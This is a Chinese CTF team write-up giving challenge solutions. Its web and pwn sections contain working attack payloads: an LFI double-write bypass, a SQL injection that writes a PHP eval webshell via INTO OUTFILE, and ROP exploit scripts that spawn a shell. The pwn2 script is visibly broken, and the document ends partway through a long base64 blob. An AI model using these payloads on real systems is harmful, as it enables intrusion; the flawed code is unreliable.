# 技能兴鲁
最终排名 15 名
# Misc
# Datas_secret
python2 vol.py -f image.vmem --profile=Win7SP1x64 filescan|grep flag
python2 vol.py -f image.vmem --profile=Win7SP1x64 dumpfiles -Q 0x0000000007a09f20 -D ./
flag
# 卑劣的手段
python2 vol.py -f image1.vmem --profile=WinXPSP1x64 filescan | grep png
python2 vol.py -f image1.vmem --profile=Win7SP1x64 dumpfiles -Q 0x0000000002d44eb0 -D ./
zsteg chuyin.png
flag{Hat3une_M1ku}rI$
# 时间不多了
import os
from pyzbar.pyzbar import decode
from PIL import Image
def scan_qrcodes(folder_path):
# 检查文件夹中的所有文件
for filename in os.listdir(folder_path):
if filename.endswith(('.png', '.jpg', '.jpeg', '.gif', '.bmp')):
# 拼接完整的文件路径
file_path = os.path.join(folder_path, filename)
# 打开图像文件
image = Image.open(file_path)
# 解码图像中的二维码
decoded_objects = decode(image)
# 打印所有解码出的二维码内容
for obj in decoded_objects:
print(f"文件 {filename} 中的二维码内容: {obj.data.decode('utf-8')}")
# 使用示例
folder_path = './attachment'
scan_qrcodes(folder_path)
扫描二维码得到 base64
MiAzIDQgOSAxNSAxNyAxOCAyMyAzMA==
NiAxMyAyMCAyNyAyOA==
MiAxNSAyMiAxNyAyNCAxNg==
NiA1IDQgMTEgMTggMjUgMjYgMjcgMjggMjAgMjE=
MiAzIDkgMTUgMjMgMzAgMzE=
NSAxMyAyMCAyNyAxNCAyMQ==
NiAxOSAyNiAyMSAyOCAyMA==
OSAxMCAxMSAxNyAyNCAzMQ==
MSAyIDMgOCAxNSAxNiAxNyAyMiAyOSAzMA==
MiAzIDkgMTYgMTcgMjQgMzAgMzE=
MiA4IDE1IDIzIDI0IDE4IDExIDM=
MSAyIDkgMTcgMjMgMzAgMjk=
base64 解码得到
之后根据日历表。画图,得到 flag
画图就像这样:
拼起来得到 flag
flag
# ** 赛后复现 **
# 未知的加密
密码用 010 打开,掩码 Password SiertingXXXX, where X is a pure number…
Sierting2023
给了一个 Virtual,容器文件。使用取证大师。
使用 VeraCrypt 挂在 enc 密码仍然是 Sierting2023 找到文件 flag.swp
# IC-Card
两个文件.
一个 IC 的 bin 文件,一共镜像层文件。
得到压缩包密码。
找到 decrypted_string 文件
# Web
# 日志里的 FLAG
<?php
highlight_file(__FILE__);
print("FLAG就存在于日志文件里哦!");
if (isset($_GET['path'])) {
$path = $_GET['path'];
if (preg_match('/flag|\$|["\']/i', $path)) {
echo "错误";
} else {
$path = str_replace("log","", $path);
if (file_exists($path)) {
$content = file_get_contents($path);
echo highlight_string($content, true);
} else {
echo "文件不存在";
}
}
} else {
echo "请提供文件路径";
}
FLAG就存在于日志文件里哦!请提供文件路径
双写绕过检查
payload
path=/var/lologg/nginx/access.lologg
# 购买 flag
登陆之后
进入花费界面
将 - 100 改为 + 100000000,发包,来回几次
在购买 flag,在控制台看到 flag
# 一只小蜜蜂
参考文章 https://blog.csdn.net/qq_43573676/article/details/105627370
在主页面进行 post 传参
_SESSION[login_in]=1&_SESSION[admin]=1&_SESSION[login_time]=99999999999
之后访问 url/admin/login.php
便会自动进入后台管理界面
之后退出登录
进入到后台登录界面
在登录界面存在 sql 注入漏洞
user=admin' un union ion selselectect 1,0x3c3f70687020406576616c28245f524551554553545b27414243275d293b3f3e,3,4,5 i into nto outoutfilefile
'/var/www/html/123.php'#&password=12&code=f333&submit=true&submit.x=49&submit.y=30
之后访问 123.php
成功写马,
蚁剑链接,得到 flag
flag
# pwn
# pwn1
from pwn import *
r = remote('vt.jnxl2023.sierting.com',32299)
# r = process("./pwn")
context.log_level = "debug"
r.sendlineafter("2.change\n", "1")
r.sendlineafter("name: ", "abf1ag")
r.sendlineafter("age: ", "18")
r.sendlineafter("address: ", "aaaa")
r.sendlineafter("2.change\n", "2")
r.sendlineafter("id: ", "0")
r.sendlineafter("address: ", "aaaa")
r.sendafter("check name: ", b"a" * 0x358 + p64(0x4025EF) + p64(0x4025D6) + b"\n")
r.interactive()
# pwn2
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
r = remote('vt.jnxl2023.sierting.com',30629)
# p = process('./pwn')
elf = ELF('./pwn')
libc = ELF('libc.so.6')
got_addr = elf.got['puts']
plt_addr = elf.plt['puts']
main_addr = elf.symbols['main']
pop_rdi = 0x4011e3
pop_rsi_r15 = 0x4006e1
ret_addr = 0x40101a
payload = (0x10+8)*b'a' + p64(pop_rdi) + p64(got_addr) + p64(plt_addr) + p64(main_addr)
r.sendline(payload)
puts_addr=u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00")
libc_base = puts_addr - libc.sym['puts']
system_addr = libc_base + libc.sym['system']
binsh_addr = libc_base + next(libc.search(b"/bin/sh\x00"))
pl = (0x10+8)*b'a' + p64(ret_addr) + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr)
r.sendline(pl)
r.interactive()
# Crypto
# EasyRSA
# BabyRSA
# 简单的 Python
解 base100
Vm0wd2QyUXlVWGxWV0d4V1YwZDRWMVl3WkRSV01WbDNXa1JTVjAxV2JETlhhMUpUVmpBeFYySkVUbGhoTVVwVVZtcEJlRll5U2tWVWJHaG9UVlZ3VlZacVFtRlRNbEpJVm10a1dHSkdjRTlaVjNSR1pVWmFkR05GU214U2JHdzFWVEowVjFaWFNraGhSemxWVmpOT00xcFZXbUZrUjA1R1pFWlNUbFpVVmtwV2JURXdWakZXZEZOc1dsaGlSMmhZV1d4b2IyVnNVbFZTYlVacVZtdGFNRlZ0ZUZOVWJVcEdZMFZ3VjJKVVJYZFpWRVpyVTBaT2NscEhjRlJTVlhCWlYxWlNSMlF5UmtkalJtUllZbFZhY2xWc1VrZFdiRnBZWlVaT1ZXSlZXVEpWYkZKSFZqSkZlVlZZWkZwbGEzQklXWHBHVDJSV1ZuUmhSazVzWWxob1dGWnRNSGRsUjBsNFUydGtXR0pIVWxsWmJGWmhZMVphZEdSSFJrNVNiRm93V2xWYVQxWlhTbFpYVkVwV1lrWktTRlpxUm1GU2JVbDZXa1prYUdFeGNHOVdha0poVkRKT2RGSnJhR2hTYXpWeldXeG9iMWRHV25STldHUlZUVlpHTTFSVmFHOWhiRXB6WTBac1dtSkdXbWhaTW5oWFkxWkdWVkpzVGs1V01VbzFWbXBLTkZReFdsaFRiRnBxVWxkU1lWUlZXbUZOTVZweFUydDBWMVpyY0ZwWGExcHJZVWRGZUdOR2JGaGhNVnBvVmtSS1RtVkdjRWxVYldoVFRXNW9WVmRXVWs5Uk1XUnpWMWhvV0dKWVVrOVZha1pIVGxaYVdFNVZPV2hpUlhBd1ZsZDRjMWR0U2tkWGJXaGFUVzVvV0ZreFdrdGtSa3B6Vld4T2FWSXpZM2hXYTFwaFZURlZlRmR1U2s1WFJYQnhWV3hrTkdGR1ZYZGhSVTVUVW14d2VGVXlkR3RoYlVwV1ZtcGFXbFpXY0doWlZXUkdaVWRPU0U5V1pHaGhNSEJ2Vm10U1MxUXlVa2RUYmtwb1VqSm9WRmxZY0ZkbGJHUllaVWM1YVUxWFVraFdNalZUVkd4T1NHRkdRbFppVkVVd1ZtcEdVMVp0UmtoUFZtaFRUVWhDTlZaSGVHRmpNV1IwVTJ0a1dHSlhhR0ZVVnpWdlYwWnJlRmRyWkZkV2EzQjZWa2R6TVZkR1NsWmpSV3hYWWxoQ1RGUnJXbEpsUm1SellVWlNhRTFzU25oV1Z6RTBaREZrUjJKSVRtaFNhelZQVkZaYWQyVkdWWGxrUkVKWFRWWndlVmt3V25kWFIwVjRZMFJPV21FeVVrZGFWM2hIWTIxS1IxcEhiRmhTVlhCS1ZtMTBVMU14VlhoWFdHaFlZbXhhVjFsc1pHOVdSbXhaWTBaa2JHSkhVbGxhVldNMVlWVXhXRlZyYUZkTmFsWlVWa2Q0VDFOSFJrZFJiRnBwVmtWVmQxWnRjRWRWTVZwMFVtdG9VRlp0YUZSVVZXaERUbFphU0dWSFJtcE5WMUl3VlRKMGExZEhTbGhoUjBaVlZucFdkbFl3V25KbFJtUnlXa1prVjJFelFqWldhMlI2VFZaWmQwMVdXbWxsYTFwWVdXeG9RMVJHVW5KWGJFcHNVbTFTZWxsVldsTmhWa3AxVVd4d1YySllVbGhhUkVaYVpVZEtTVk5zYUdoTk1VcFdWbGN4TkdReVZrZFdibEpPVmxkU1YxUlhkSGRXTVd4eVZXMUdXRkl3VmpSWk1HaExWMnhhV0ZWclpHRldWMUpRVlRCVk5WWXhjRWhoUjJoT1UwVktNbFp0TVRCVk1VMTRWVmhzVm1FeVVsVlpiWFIzWWpGV2NWTnRPVmRTYlhoYVdUQmFhMkpIU2toVmJHeGhWbGROTVZsV1ZYaFhSbFp5WVVaa1RtRnNXbFZXYTJRMFlURk9SMVp1VGxoaVJscFlXV3RvUTFOV1drZFZhMlJXVFZad01GVnRkRzlWUmxsNVlVaENWbUpIYUVSVWJYaHJWbFpHZEZKdGNFNVdNVWwzVmxSS01HRXhaRWhUYkdob1VqQmFWbFp1Y0Zka2JGbDNWMjVPVDJKRmNIcFhhMlIzWVZaT1JsTnJiRmROYmxKeVdYcEdWbVZXVG5WVGJGSnBWbFp3V1ZaR1l6RmlNV1JIV2taa1dHSkZjSE5WYlRGVFpXeHNWbGRzVG1oV2EzQXhWVmQ0ZDFZeVNsbFZiR2hoVWtWYVlWcFZaRXRUVms1ellVZG9UazFWY0ZaV2JHTjRUa2RSZVZaclpGZGlSMUp2Vlc1d2MySXhVbGRYYm1Sc1lrWnNOVmt3Vm10V01ERkZVbXBHV2xaWFVuWldNbmhoVjBaV2NscEhSbGRXTVVwUlZsZHdTMUl4U1hsU2EyaHBVbXMxY0ZsVVFuZE5iRnAwVFZSQ1ZrMVZNVFJXVm1oelZtMUZlVlZzV2xwaVdGSXpXVlZhVjJSSFZrWmtSM0JUWWtoQ05GWlVTWGRPVjBwSVUydG9WbUpIZUdoV2JHUk9UVlpzVjFaWWFGaFNiRnA2V1ZWYWExUnNXWGxoUkVwWFRWWndhRlY2UmtwbFJsSjFWbXhLYVZKc2NGbFdSbEpIVXpBMWMxZHJaRlpoTWxKWFZGWmFkMDFHVm5Sa1J6bFdVbXhzTlZsVmFFTldiVXBJWVVWT1lWSkZXbWhaZWtaM1VsWldkR05GTlZkTlZXd3pWbXhTUzAxSFJYaGFSV2hVWWtkb2IxVnFRbUZXYkZwMFpVaGtUazFZUWxsYVZXaExZa1paZUZkcmJHRlNWMUYzVmxSS1JtVnNSbGxhUm1ocFVteHdiMWRXVWt0U01WbDRXa2hXVkdKWGVITlpWRVozVjFaa1dHVkhPVkpOVlRFMFZsZDRhMWxXU2xkalNFNVdZbFJHVkZZeWVHdGpiRnBWVW14a1RsWnVRalpYVkVKaFZqRmtSMWR1VGxSaE1taG9WV3RXWVZsV2NGWmFSWFJVVm1zMWVsbFZaRzlVYXpGV1kwWmFWMkpIVGpSVWEyUlNaVlphY2xwR1pGaFNNMmg1Vmxkd1ExbFhUa2RXYmxKc1UwZFNjMWxyV2xkT1ZuQldZVWQwV0ZJd2NFaFpNRnB2VjJzeFNHRkZlRmRoYTFwb1ZXMTRhMk50VmtkYVJUVlhZbXRLU2xZeFVrcGxSazE0VTFob2FsSlhhSEJWYlRGdlZrWmFjMkZGVGxSTlZuQXdWRlpTUTFack1WWk5WRkpYWWtkb2RsWXdXbXRUUjBaSVlVWmFUbEp1UW05V2JURTBZekpPYzFwSVNtdFNNMEpVV1d0b1EwNUdXbFZUV0dSUFZqQndTVlV5ZEc5V2JVcElaVWRvVjJKSFVrOVVWbHB6VmpGYVdXRkdhRk5pUm5BMlYxWldZV0V4VW5OWFdHeG9Va1Z3V0ZSV1duZGhSbFkyVW10d2JGSnNTakZXUnpGSFZUSktSMk5HYkZoV00xSjJWVlJCTVdNeFpISmhSM1JUVFVad1dWZFhlR0ZaVm1SWFYyeG9hMUo2Ykc5VVZsWnpUbFpzVm1GRlRsZGlWWEJKV1ZWV1QxbFdTa1pYYldoYVpXdGFNMVZzV2xka1IwNUdUbFprVGxaWGQzcFdiWGhUVXpBeFNGTlliRk5oTWxKVldXMXpNVlpXYkhKYVJ6bFhZa1p3ZWxZeU5XdFVhekZYWTBoc1YwMXFSa2haVjNoaFkyMU9SVkZ0UmxOV01VWXpWbXhTUzFKdFZuTlNiR3hoVW0xb2NGVnRlSGRpTVdSWFZXdDBVMDFXYkRSV1J6VlhWbGRLV0dGRk9WVldla1oyVmpGYWExWXhWbkphUjNST1lURndTVlpxU2pSV01WVjVVMnRrYWxORk5WZFpiRkpIVmtaU1YxZHNXbXhXTURReVZXMTRiMVV5UlhwUmJVWlhWbTFSTUZsNlJtdFNNV1IxVld4YVYxSlZjRzlXVjNSWFdWWnNWMk5HV2xoaVdGSnlWbTEwZDJWc1duUk5XRTVYVFZWc05sbFZVbUZXTURGWVZWaGtXRlp0VWxOYVZscGhZMnh3UjFwR2FGTk5NbWcxVm14a2QxUXhWWGxUV0docFUwVTFXRmx0TVZOWFJsSlhWMjVrVGxKdGRETlhhMVpyVjBaSmQyTkZhRnBOUm5CMlZqSnplRk5IUmtabFJtUm9ZVEZ3YjFaWE1UUmhNazUwVm10a1lWSXlhRzlVVkVKTFZXeGFjMVZyWkdoTlZURTBWVEZvYjJGc1NsaFZiV2hXWWxoTmVGWXdXbHBrTVZweVpFVTFhVkp1UVhkV1JscFRVVEZhY2sxV1drNVdSa3BZVm0weGIyVnNXblJOVlZwc1ZteGFlbFp0ZUhkaFZtUkhVMWh3V0ZZelFraFdha3BQVmpGU2RWVnNRbGRpVmtwVlYxZDRiMkl4YkZkYVJsWlNZbFZhYjFSWGRIZFRWbFY1WkVjNVYySlZjRWxhVldSdlZqSktTRlZyT1ZWV2JIQjZWbXBHWVZkWFJrZGhSazVwVW01Qk1WWXhXbGRaVjBWNFZXNVNVMkpyTlZsWmExcGhWMFpzVlZOc1NrNVNiRmt5VlcxME1HRnJNVmxSYTNCWFlsaG9WRmxXV2t0ak1rNUhZa1pvVjAweFNtOVhhMUpDVFZkTmVGcElTbWhTTTJoVVZGVmFkMkZHV25STlNHaFdUVlZzTkZaWE5VOVhSMHBXVjJ4a1ZtSllhRE5VVlZwaFYwVTFWbFJzWkU1aE0wSktWMVpXVjFVeFdsaFRiR3hvVWpKb1dGbHJXbmRWUmxwelYydDBhazFXY0hsVWJGcHJZVmRGZDFkWWNGZGlXR2h4V2tSQmVGWXhVbGxoUmxwWVVqSm9XbGRYTVhwTlZscFhZa2hLWVZKNmJGaFphMXAzWld4WmVVNVhkRlZoZWtaWVdUQm9jMVl3TVhGU2EyaGFWak5vYUZreU1VOVNWa3B6WVVkb1RsZEZTbEpXYlhSclRrWnNXRlJ1VWxWaE1WcFlXV3RrVTFaR1VsVlRiVGxwVFZad2VWWlhkREJWTURGWFlrUlNWMUo2VmxoV2JURkxVbXhPYzJGR1dtbFNhM0JaVm1wR1lWbFdTWGhpUkZwVFlsZDRUMVpxUmt0VFZtUllaRWM1VTAxV2NFbFZiR2h2WVd4T1JrNVdaRnBpUmtwSVZtdGFXbVZYVmtoa1IzQnBVbTVDVjFaWE1UUmlNVlY1VWxod1VtSlZXbGhXYlRGU1RVWndSVkpzY0d4V2F6VjZXV3RhWVdGV1NYbGhSemxYVmpOU1dGZFdaRTlqTVZwMVVteFNhRTB4U2xaV2JURTBVekF4UjJKR1dsaGhlbXh2VldwR1lXVnNXWGxqUjBaWFRVUkdXVlpXYUd0WFJscDBWV3hPWVZac2NHaFpNbmgzVWpGd1IyRkdUazVOYldjeFZtMTRhMDFHV1hoVVdHaGhVbGRTVjFsclpGTlhWbXgwVFZaT2FrMVdjREJhVldoUFZERmFkVkZzWkZwV1YxRjNWakJhU21ReVRrWmhSbkJPVW01Q01sWnFTbnBsUms1SFZtNVdXR0pIVWs5WmJURnZZakZhY1ZGdFJsZE5helY2V1RCV2IxVXlTa2hWYkdoVlZteGFNMVpYZUdGak1YQkpXa1pTVGxaWGR6QldWRVp2WXpGVmVWSlliR2hUUlVwWFdXeG9UbVZHYTNkWGJrNVhWbXRhTVZkclZURmhWa3AxVVZoa1YxSnNjRlJWVkVaaFkyc3hWMWRyTlZkU2EzQlpWbTB3ZUdJeVZuTlhibEpPVmxad2MxWnRlR0ZsYkZsNVpVaGthRlp0VWtoVk1XaDNWMFphYzFkdGFGZGhhM0JVVlRCYVlXTnNaSFJrUms1T1RVVndWbFl4WkRCaU1VVjNUbFZrV0dKR1dsVldNR1JUVlVaYWNWRnVaRlJXYkZZMVdrVmpOVll5U2xaalJXeGhWbGRTZGxacVNrdFRSbFp5VDFaV1YySklRalpXYlhCSFdWWmtXRkpyYUdwU01uaFlWakJXUzFOR1duUmxSM1JQVWpCV05GWlhOVTlYUm1SSVpVYzVWbUV4V2pOV01GcFRWakZrZFZwSGFGTmlSbXQ1VmxjeE1HUXlTa2RUYms1VVlXdGFXRmxzYUc5VVJteFhWMnQwYWsxck5VaFphMXB2VmpBd2VGTnFTbGRXYkVwSVdWUkdXbVZHY0VsVGJXaFRUVEZLVlZaR1ZtRmtNa1pIVjI1U1RsTkhhRmRVVmxVeFYwWlplV1ZIT1doTlZXOHlXV3RqTlZaV1duTlhhazVWVmxad2VsWnRlR3RqTVZKeldrWmthVk5GU21GV01WcFhWakZWZUZkdVNrNVdiVkp4VlRCV2QxZEdiSEpYYm1SVVVtNUNSMVl5ZERCaE1VbDNUbFZrVldKR2NISldSM2hoVjBkUmVtTkdaR2xYUjJoVlZsaHdRbVZHVGtkVGJHeG9VakJhVkZacVNtOVdiR1JZWkVkMGFVMXJiRFJXYlRWVFZHeGFObUpIUmxkaVdHZ3pXbFphWVdSRk1WWmFSbFpvWld0YVdWZFVRbTlqTVZsM1RWaEdVMkV5YUdGV2FrNXZZVVpyZVUxVk9WTldhMW93VlcxNFQxWXdNVlpYV0hCWFlsaG9WRlY2Umt0a1JscDFWR3hPYVZJemFHOVdWekI0WWpKT1IxWnVVbXhUUjFKd1ZGWmtVMWRHV2xoa1JFSldUVVJHV1ZaWGRHOVdhekYxWVVod1dGWnNjRXRhVjNoSFl6RldjMXBIYUdobGJGbDVWbTF3UjFsWFJYaGFSV2hYWVRKb1VWWnRkSGRVTVZwMFpFaGtWRlpzY0hwWFdIQkhWa1V4V0ZWcmJGWk5ibEpvV1ZkNFQxSnJOVmRhUm5CcFVtdHdTVlp0ZEdGa01XUklWbXRzVldKSFVuQlZha1pMVG14YWNsa3phR2xOVmxZMFZqSjBZVmRIUm5OalJtaFhZVEZhZVZwVlduTldWa3B6WTBkNFUySldTbUZYVkVKaFdWZEdWMWRZYkdoU2JXaFpXV3RrVW1ReFpGZFhiazVYVFdzMVNGWXllRzloVmtsNFUyNW9WMUp0VVhkWFZscEtaVVpXV1dGR2FHbFhSa3AzVmxkd1EyUXhaSE5pUmxwV1lsVmFXRlJWVWtkWFZscFhZVWQwV0ZKc2NEQldWM2hQV1ZaYWMyTkhhRnBOYm1nelZXcEdkMU5IU2toaVJrNVlVbFZ3VTFadE1IZGxSVFZJVWxob1YxZEhhRmxaYlhNeFZqRnNjbHBIT1dwaVJsWXpWMnRhVDFZeFNuTlRiR2hYVFdwV1VGWkVSbUZrVmtaeldrWndWMVl4UmpOV2FrSmhVMjFSZVZScldtaFNia0pQVlcwMVEwMXNXbkZUYm5Cc1VtczFTVlZ0ZEdGaVJrcDBWV3M1V21KVVJuWlpha1poWTFaR2RGSnNaRTVoZWxZMlYxUkNWMkl4VlhsVGEyaFdZa2RvVmxadGVHRk5NVnBZWlVkR2FrMVdXbmxYYTJSdlZHeGFWVkpVUWxkV1JWcDJXV3BLUjJNeFRuTmhSbHBwVmpKb1dGZFhlRzlVYlZaSFYxaGtXR0pJUW5KVVZscDNaVlp3UmxaVVJtaFdhM0F4VlZab2ExZEhTa2RYYmtaVllrZFNSMXBFUVhoV01XUnlUbFprVTJFelFscFdiVEIzWlVkSmVWVnVUbGhYUjFKWldXeG9VMVpXVm5GUmJVWlVZa1phTUZwVlpFZGhSbHB5WWtSU1ZtSkhhSEpXYWtwTFZsWktWVkZzY0d4aE0wSlFWMnhXWVdFeVVsZFdiazVWWWxkNFZGUldWbmRXYkZsNFdrUkNWMDFzUmpSWGEyaFBWMGRGZVdGSVRsWmhhelZFVmxWYVlXUkhWa2xVYXpsVFlrZDNNVlpIZUZaT1YwWklVMnRhYWxKdGVHRldiRnAzWkd4YWNWTnJaR3BoZWxaWVZrY3hSMVV4U2xkalJGcFhZbGhDU0ZkV1dtdFhSa3B5V2tkb1UyRjZWbmRXVnpBeFVXc3hjMWRZYUZoaVIxSmhWbXBDVjA1R1dsaE9WVGxZVW0xU1NWcFZZelZXYlVWNFYycE9WMDFHY0ZSV2FrWnJaRlp3U0dGR1RtbFNiWFExVm14amVFMUZNVWhTYmtwT1ZtMVNWVmxYZEdGWFJscHhWRzA1VmxKdGVGaFdNblIzWWtaS2NrNVVSbGhoTVhCeVdWWmFhMUl4VG5OaVJtUnBWa1ZKTUZac1kzaFdNVWw0WTBWc1YySkZOWEJWYkdoRFpERmFkR1ZIUm10TmJFcDZWakowYTFsV1RrbFJhemxYWVd0YWFGcFhlRnBsUjBaSlZHeFdUbFp1UWpWV1IzaHFUbFphVjFkdVRsaGhhelZXVm14YWQyRkdXWGRXVkVaWFlrWktlbGRyVlRGaFJUQjNVMnQwVjAxV2NGaFdha1pXWlVaa2MyRkdVbWhOYkVwNFZsZHdTMkl4V1hoVmJGcGhVbXMxV1ZWdGVGZE5NVmw1WkVSQ2FFMVZiRE5VYkZaclZsZEtSMk5JU2xkU00yaG9WakJrVW1WdFRrZGFSMnhZVWpKb1ZsWnNhSGRSYlZaSFZHdGtWR0pIZUc5VmFrSmhWa1phY1ZOdE9WZGlSMUpaV2tWa01HRlZNWEppUkZKWFlsUldWRlpIZUdGT2JVcElVbXhrYVZaRlZYZFdiVEUwVmpKU1JrNVdhR3RTYkZwdldsZDBZVmRXWkZoa1JrNVZUVlpzTTFSV2FFZFdNa1Y2WVVkR1dsWkZXak5XUlZwM1VteGtjMXBIZEZkTlNFSktWbGN4TkZReFdYZE5WbHBZVjBoQ1dGbHNhRzlXUmxZMlVtdDBhMUpzY0RGV1IzaFBZVmRGZUdOR2NGaFdNMUp5VmxSS1QxSXhXblZTYkU1b1RWaENlVlpHV210Vk1XUkhWMnhvYTFKRlNsZFVWVkpIVjBac2NsVnNUbGROVlc4eVZtMTRRMWRHV25OalJYUmhWbTFTU0ZWdGN6VldNVnB6V2tVMVRtSlhhRTlXYlRGM1VqRnNXRkpZYUdGU1YyaFlXVlJLYjFWV1duUmtTR1JWVFZad01GcEZhR3RXUmxwelkwaHdXRmRJUWtoV2ExVjRWMFpXY21KR1drNWliRXB2VjFaa05GUXhTbkpPVm1Sb1VtNUNjRlZxU205V1ZscEhWV3RrYTAxV2JEUlhhMmhUWVRGSmVsRnVRbFpoYTFwTVZHMTRZV05zY0VWVmJXeE9WbXhaTVZaWGVHOWpNa1Y1Vm01S1dHSkhlRmhaYkdodllVWnNWbGR1WkZOV2EzQXdXa1ZhVDFSc1dYaFRhbEpYWVd0dk1GVjZSbXRTTVU1WllrZG9VMkpYYUZsWFYzaHZWVEZrUjFwR1pHRlNWR3h4VkZaYWQwMVdWblJsUlRsb1ZtdHNORlV5Tlc5V01VcDBWVmhrV0Zac2NFdGFWVnBYVjFkR1IyRkhiRmhTYTNBeVZteGtkMUl4YkZoV2JrNVlWMGQ0YzFWc1pGTlhSbEpZWkVaa1QxSnRkRE5YYTJNMVYwWktjMk5FUWxkV00yaFFWMVphWVdNeVRraGhSbkJPWW0xbmVsWlhjRWRrTVVsNVVtdGtWV0Y2Vms5WmJHUnFaVVphZEUxVVVtaE5iRVkwVld4b2IyRldTblJoUmxwYVZrVndWRll3V25Oa1IxWkdaRWR3VGxac1dYcFdNblJoVkRKR2NrMVdhR3hUUjNoWVZGYzFiMk5zV2tWU2JVWnJWbXRhZWxkclduZFdNVmw0VW1wT1YyRnJTbWhWTWpGU1pWWlNjbGR0YUZOaWEwcFFWbGN3TVZFd01YTlhia1pVWW01Q2MxVnRjekZUVmxaMFpFZEdhVkpyY0RCV1Z6QTFWMnhhUms1VlVsWk5WbkJ5Vm14YVQyTldWblJoUlRWb1pXeFdNMVp0TUhoTlIwVjRZa1prVkZkSGVHOVZibkJ6Vm14YWNsWnJkRlZTYkhCWldsVmtSMkZyTVZsUmEzQllZVEZ3VUZaSGVHRmtSMUkyVW14a2FFMVlRakpYV0hCSFZtMVdWMU5zYkdsU01taFZWV3hXZDFkR1pGaGxSemxWWWxaYVNGbFVUbXRYUjBwSFkwaEtWVlpzY0ROYVZscDNVbXhhVlZKdGFGZGhNMEY0Vmxaa2QxVXhXWGhYYTFwcVVrVTFWMVpyVm1GaFJtdDVZek5vVjAxWFVqQlphMXBQVlRKRmVsRnNjRmRpUjA0eldsVmtTbVZXV25WVWJHaHBZWHBXV2xkWGVHOVZNVnBYVm01R1UySlZXbFZWYlhoelRsWndWbUZIZEZkTlJFWlhXVEJhYjFkdFJuSk9WRTVYVFVad1lWcFhlRWRqYlVaSFdrZG9hRTB3U2xKV2JURjNVakZaZVZWc1pGVmlhelZZV1d4a05GWkdVbGRXYm1SWFlrWnNORmRyVWxOaFZURnlZa1JPVldKR2NISldNR1JMWXpGT2NrOVdXbWhOVm5CdlYxZHdSMVV4V1hoYVNGWlZZWHBzVkZsclpETk5WbHBJWlVaYVQxWXdXa2xWTW5SaFlXeEtXRlZzWkZWV00wSklXa2Q0WVdSRk1WWmtSbEpUWWtad05sWnNaRFJaVmxKelUyNVdVbUpYYUZsWmExcDNZMnhhY1ZKck9WTk5WVFV4VmxjeE1GVXlSalpXYm1SWFZucEJlRlZYYzNoV01XUlpZVVpvYVZJeFNtaFdiWEJEVmpBMVIxZHNhRTlXYXpWWFZGZDBkMlZXVW5OWGJrNVlZbFZXTkZrd1pHOVdNREZIWTBod1YySkdjRkJaZWtaUFkyczFWMVJ0YkZOaVdGRXhWbTE0YW1WRk1VWk5WV2hUWW10d1QxWnRNVFJWTVd4VlZHdE9XRkp0ZUhwWlZXTTFWakZLZEdWR2FGZE5ibEYzV1ZkemVHTnJOVlpoUm5Cb1RWaENNbFp0Y0VKa01sWkhWRzVHVkdKSFVsaFphMVozVWtaYVIxZHRkRlZpVmxwSVdUQldjMVpIU2xoaFJsSlZWa1Z3ZGxac1dtRlNNVnAwVW0xMFRtRXhjRWxXYWtreFZURlNjMVJyYUdoU2JWSldWbTE0WVdWc1VuSlhiVVpZVWxSV1YxUXhXbTlWTURGSlVXeG9WMkZyYnpCWlZFWmhaRVpPYzJKSGFGTlNWRlpYVm0xNFlXUXlSa2RYV0dSWFZrVmFXRmxyV2t0bGJHUnlWbFJHYUZKVVFqTlZNblF3VmpBeFYyTkdhRmRoYTFwWFdsVmFhMk15UmtkVmJXaE9Za1Z3TkZac1pIZFRNa2w0VjFob1ZtSkdjR2hWYlhNeFYxWldkR1ZHWkU1TlZtdzFXa1ZTUTJGRk1WWmlSRTVWWWtaYWNsWnNaRXRTTWs1SlUyeGtVMDB5YUc5V2FrSnJWVzFXZEZSclpHRlNNbmhaVldwS2IxWnNXbk5oU0dSU1lsWmFTRlpIZEd0V1YwcElaVWhDVm1KWVRYaFpha1pUVjBkV1JtUkdaR2xTTVVwYVZrWmFiMlF4VW5OWGJrNXFVbTFvWVZsVVNtOVZSbHB4VTJ0MFYySkhVbnBaVlZwM1lVVXhXVkZZY0ZkU2JGcG9Xa1JHWVdSR1NuSmhSM1JUWWtad2RsZHNaREJaVm1SeldraE9WMkpWV205VVZscHpUVEZTVjJGRlpGZE5hM0I1V1RCYWIxWXlSWGhYYWs1WFVsWndWMXBWV210amJIQklZMGRzVkZKVmNFcFdiVEI0WldzeFYxZFliRlJoTWxKWVdWZDRTMWRHVWxkWGJtUm9VbTFTV0ZZeWN6RmlSa3AxVVd0b1dHRXhjRkJaVm1SR1pVZE9SMk5HYUZkTk1VcDVWMWR3UjJFeFNYbFRhMnhVWWtkb2NGbHNXa3RsYkZwMFRVaG9WazFYVW5wWlZFNXJWakpLV1ZWc2FGVldNMUl6VmpCYVYyUkhUa1pQVm1SWFlraENObGRVUW05VE1WbDNUVlZvVm1FemFGaFVWV1JUVjBaVmVGZHNUbXBOYXpWSVYydGFUMVl5U2xWaGVrcFhZbFJHTTFWcVJuTlhSa3BaWVVkR1UxWXlhRmxYVmxKTFlqRldWMWR1VW10VFIxSldWRlphZDAxR2NFWmhSM1JYVW14d2Vsa3dhSGRYUjBWNFUyeFNWMDF1YUdoYVJXUlhVakpHUjFkck5XbGlWMmcxVmpGYWEwNUdVWGhUYmtwUFZtMVNhRlZ0TlVOalJsWjBaRWhrVkZac2NEQmFSV1JIVjBkS1YxZHNiRmRpV0ZKNlZteGtTMWRXUm5WUmJGcG9ZVEZ3VFZaSE1UUlpWMDV6WVROd2FGSXllRTlXYlhoYVRVWmFjVk5xUWxwV2JWSkpWVzAxVDJGc1NuUmhSbWhhVmtWYWFGcFdXbmRXYkdSMVZHMXdWMkV6UWpaWFZFSnJUa1pWZVZOc1pGUmlWVnBaVm10V1MyTnNiSEZTYkZwclRVUkdXbFpYTVc5Vk1sWjBaVVpzVjJKWVFsQldWRVpyVWpGd1IxcEdhR2xoZWxaWlZrWmtlazFXVGtkWFdHeHNVbnBzYjFadE1WTlRSbFY1VGxoT1YwMXJjRlpWYkZKRFYwWmFjMVpxVWxaaGEzQlFWV3BHYTJNeVJraGhSM2hwVjBkb2FGWnRlR3BsUlRGSVZWaHNWMkpIVW05VVZFcFRWMVpzZEUxV1RsaFNiRXBaV2tWYWExUXhTblJrUkU1WVlUSk5NVll3V2t0ak1rNUpZMFp3VGxJeVozcFdiWEJMVWpKT2MxcElUbFppU0VKUFdXMHhibVZzV2xoalJXUnJUVlUxU